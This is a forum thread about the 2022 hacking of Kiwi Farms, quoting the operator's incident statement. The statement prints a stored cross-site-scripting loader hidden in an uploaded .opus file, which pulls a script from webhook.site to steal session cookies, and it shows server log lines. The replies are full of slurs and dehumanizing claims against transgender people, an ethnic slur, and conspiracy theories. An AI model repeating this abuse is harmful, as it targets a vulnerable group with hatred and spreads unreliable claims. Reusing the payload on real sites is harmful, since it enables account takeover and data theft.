Kiwi Farms under attack again

Da Noos

Sobek

Disgusting Scalie
Joshua has decided to lock new registration for the site as a safety net against false flags and obvious bait. Those who want a account now need to have a invite from a Kiwi member.

.st domain now pretty stable, with a strong DDOS shield.

Tor network more robust.

Some old lolcow has been tricked by some troll into thinking he "bought KiwiFarms" apparently. Joshua is pretty astonished and says whoever scammed the dude should feel bad for taking advantage of the mentally impaired.
 
Hacking attempted, nearly succefull

Sobek

Disgusting Scalie
Since it is taking too long to destroy KiwiFarms, the troons have decided to just go full terrorist and hack it. They failed for now, but Joshua is on the lookout.

dangerous.png
 

Husky_Khan

The Dog Whistler... I mean Whisperer.
Founder
Sotnik
Since it is taking too long to destroy KiwiFarms, the troons have decided to just go full terrorist and hack it. They failed for now, but Joshua is on the lookout.

dangerous.png

That is insane!

I hope CNN extends an interview to Joshua Moon (like they did Keffals) so he can tearfully talk about the harassment, hacking, cyberbullying and more his forum and its users have been receiving for doing the 'To Catch A Predator" thing on the internet.
 

Cherico

Well-known member
That is insane!

I hope CNN extends an interview to Joshua Moon (like they did Keffals) so he can tearfully talk about the harassment, hacking, cyberbullying and more his forum and its users have been receiving for doing the 'To Catch A Predator" thing on the internet.

CNN only tells one side of the story their side.

Also what goes around comes around.
 

Sobek

Disgusting Scalie
That is insane!

I hope CNN extends an interview to Joshua Moon (like they did Keffals) so he can tearfully talk about the harassment, hacking, cyberbullying and more his forum and its users have been receiving for doing the 'To Catch A Predator" thing on the internet.

>Cnn being fair

Good joke

KF, big beast?

I really don't think it is anywhere as big as 4, 8 and all the other chans out there.

I disagree, KF is a much bigger beast than 4 and 8 chan are. Their forums have huge archives, readily accessible, and they have receipts of everything as it happens. The chans might be better for chaotic meme generation but KF is keeping the timeline and the archives of the deeds of the degenerates.
 

Zachowon

The Army Life for me! The POG life for me!
Founder
>Cnn being fair

Good joke



I disagree, KF is a much bigger beast than 4 and 8 chan are. Their forums have huge archives, readily accessible, and they have receipts of everything as it happens. The chans might be better for chaotic meme generation but KF is keeping the timeline and the archives of the deeds of the degenerates.
Lolcow does the same thing as KF but is lesser known
 

Agent23

Ни шагу назад!
>Cnn being fair

Good joke



I disagree, KF is a much bigger beast than 4 and 8 chan are. Their forums have huge archives, readily accessible, and they have receipts of everything as it happens. The chans might be better for chaotic meme generation but KF is keeping the timeline and the archives of the deeds of the degenerates.
And that paints a big target on it and makes it inherently less private than the chans, IMHO. Just the fact they had such a big breech speaks volumes, and IMHO XenForo being bloated does not help security.
Also, if you think this is just a bunch of troons I have a bridge to sell you, they are probably trying to take it out before the midterms.
 

Jormungandr

The Midgard Wyrm
Founder
And that paints a big target on it and makes it inherently less private than the chans, IMHO. Just the fact they had such a big breech speaks volumes, and IMHO XenForo being bloated does not help security.
Also, if you think this is just a bunch of troons I have a bridge to sell you, they are probably trying to take it out before the midterms.
Yeah, this feels like there's something more going on than a bunch of trans-trender activists trying to bring down a site for exposing their child-fucking or grooming.
 

The Immortal Watch Dog

Well-known member
Hetman
Yeah, this feels like there's something more going on than a bunch of trans-trender activists trying to bring down a site for exposing their child-fucking or grooming.

There are several admitted federal agents who post there. One who spent the whole of the post 2020 election trying to demoralize as many of the users as possible. When that failed he went schizo and started babbling about how black Americans are the psyop designed to keep humanity from exploring and colonizing outer space and that China was the future

Moon himself has always struck me as slightly bioluminescent.

Could be the men behind the scenes who originally figured this weird internet forum thing was a great honey pot slash distraction factory are realizing hey wait. No, this place actually serves as a repository for dirt and that's dangerous.

Some of these trannies they document may actually be IC affiliated as well.

The diseased filthy half Mexican slag that got Chris Chan to rape his mother is the daughter of a very well connected glowie with ties to the BIdens supposedly.

Wouldn't be surprised if they accidentally documented a tranny whose a CIA scion or something.
 
Last edited:

King Krávoka

An infection of Your universe.
User Impact Statement
The forum was hacked. You should assume the following.

  • Assume your password for the Kiwi Farms has been stolen.
  • Assume your email has been leaked.
  • Assume any IP you've used on your Kiwi Farms account in the last month has been leaked.
Thankfully, most users pay attention to my privacy checkups and there isn't much to leak.


You should take a moment to read privacyguides.org, even if you hate this site. Use an email address from a reputable provider. Never use the same password. Use a passphrase with a password manager suggested on PrivacyGuides. Use email aliases instead of burner emails so you keep access to your accounts without risking your privacy.

I do not know for sure if any user information was leaked. In my access logs, they attempted to download all user records at once. This caused an error and no output was returned. I shut everything off soon after. If they scraped information through some other mechanism, I cannot say with any confidence either way.

Prognosis
The site will be restored from a backup point taken at September 17th at Noon GMT.

This will not happen immediately. I need to reformat and reinstall everything. I need to completely evaluate my security from the top down.

Cloudflare not only provided DDoS protection, they also accounted for many popular exploits like this. As I've worked for weeks to combat the endless flow of attacks from every conceivable angle I have spread myself very thin and hurridly replaced old systems with new ones that are not properly vetted.

Even now, the many groups which have organized to terrorize businesses and attack the servers are looking for new opportunities to complicate our situation.

I am very, very tired of writing statements like this, but I find it difficult the stifle my righteous indignation. Every time I see the reaction of these people, it is this hideous arrogance. I am so filled with utter revulsion at the thought of letting smug, dangerous perverts get away with hiding who they are from the public.

More than anything, I really miss spending time with you guys and laughing at stupid shit. It is very draining to deal with such miserable people all the time.

Technical Explanation
Yesterday, vsys - one of our hosts out of Ukraine - was compromised. I initially believed that this allowed a hacker to take over that webserver and snoop data as a man-in-the-middle. I no longer believe that is the case.

A bad actor was able to upload a webpage disguised as an audio file to XenForo. Elsewhere, he was able to load this webpage (probably as an inline frame), causing random users to make automated requests and send their authentication cookies off-site, so that the attacker could use it to gain access to their account. My admin account was compromised through this mechanism.

Once they had access to the ACP, they attempted to download user data, and XenForo provides a way to export user lists with information that is precisely: email, username, last acitivity, register date, user state (banned/unverified), post count, and if they are staff.

However, their request did not appear to go through because they requested too many records at once. The following record reports a 500 error and no content.

2a03:e600:100::31 - - [18/Sep/2022:08:16:13 +0000] "GET /admin.php?users/list-export&export=1 HTTP/2.0" 500 0 "https://kiwifarms.st/admin.php?users/list" "Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0"
It's impossible to say if they acquired user data through other means, but I did not see any other attempt to complete this transaction or otherwise scrape user data.


The file uploaded was an .opus file that contained a web document that looked like this.

<!DOCTYPE html>
<script src=//webhook.site/payload-url></script>
I do not know what was in the payload. The webhook site allows for you to redirect to other scripts and to delete request history, which was done. There's no information tied to that page.


The script caused the user to load /test-chat, my chat shim, /help/, XenForo's help documentation, /avatar/avatar, to change their avatar to the logo of another site (likely as a frame job), and admin.php?tools/phpinfo, if they were an admin.

The script was uploaded to XenForo directly (as XenForo does not validate media), but injected by my custom Rust-based chat program that interacts with XenForo and borrows sessions.

x.x.x.x - - [18/Sep/2022:03:03:53 -0400] "GET /data/audio/xxxx/xxxx.opus HTTP/1.1" 200 90 "https://kiwifarms.st/test-chat?style=dark" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
You can find relevant scripts below.


XenForo removed us from their license a year ago and their software is no longer sufficient for our needs. We needed something custom, but my confidence in my work has been shot.

The sophistication in this attack is very high, and shows an intimiate familiarity with both Rust and XenForo. It is unfortunate that they have applied themselves to this end, likely for pay.

There are so many more people trying to destroy than create.

Take it easy,
Josh
<jcmoon@pm.me>

P.S. I am still expecting to have to deal with that family emergency. If that happens, I will be gone for a while. Updates will be on t.me/s/kiwifarms.
 

Agent23

Ни шагу назад!
The script was uploaded to XenForo directly (as XenForo does not validate media), but injected by my custom Rust-based chat program that interacts with XenForo and borrows sessions.
Sounds like his rust dalliance might have been the primary problem here.
This is why people should stay away from hypster languages invented and pushed by rabid SJWs, preferably ones that have quality web development frameworks and mechanisms to clean up potential code and sql injections, I mean, even shit like PHP has those BUILT INTO IT.
Guy stuck his dick in a crazy hooker, then he found out he has the clap.
 

The Immortal Watch Dog

Well-known member
Hetman
Imagine being so oppressed you have the power to deny someone legal representation, a mail address, and a phone number. Must be hard to be transgender.

And this is a good time to remind everyone that the people in power turned Loudon County's school system into a rape camp for them and threw the parents of their victims in jail.

And the attacks on Moon occur just as paypal and fucking stripe terminate work with libs of tiktoc and gays against groomers over this.

Only good to come out of this is Tucker Carlson calling them all rapists and mentally ill on TV and his guests straight up accusing big banks of being pro child rape.

The normie backlash to this stuff is coming and it's coming hard. There are laws that are gonna end up being passed targeting payment processors that defend this shit and AGs like Ken Paxton are going to be prompted by angry voters to start trying to throw ceos in prison for defending groomers.

And that's another reason they're becoming so aggressive and taking such extreme measures. Because they know what's coming.

And good.

I hope this backlash gets so extreme people with alternate pronouns in their bios end up subjected to random welfare checks.

Fuck this, the religious right was correct about everything. MLKs outrageously schizoid belief that an LGBT illuminati exists that cavorts with demons and is trying to destroy the world in the name of the antichrist by "sissfying man" is all true.

It's all true.

Reject alphabet soup! Embrace Family Man!

They straight up using "muh russia" as a reason to deny Joshua representation. They are attacking his lawyers and attorneys. This is full and complete political persecution.

statement.png

Josh has a lot of ammo to sue a lot of people for contract breach and other things over.

I hope he gets to become the next Hulk Hogan and some billionaire uses him as a proxy to start legally yeeting busineses that defend troons.
 

Users who are viewing this thread

Top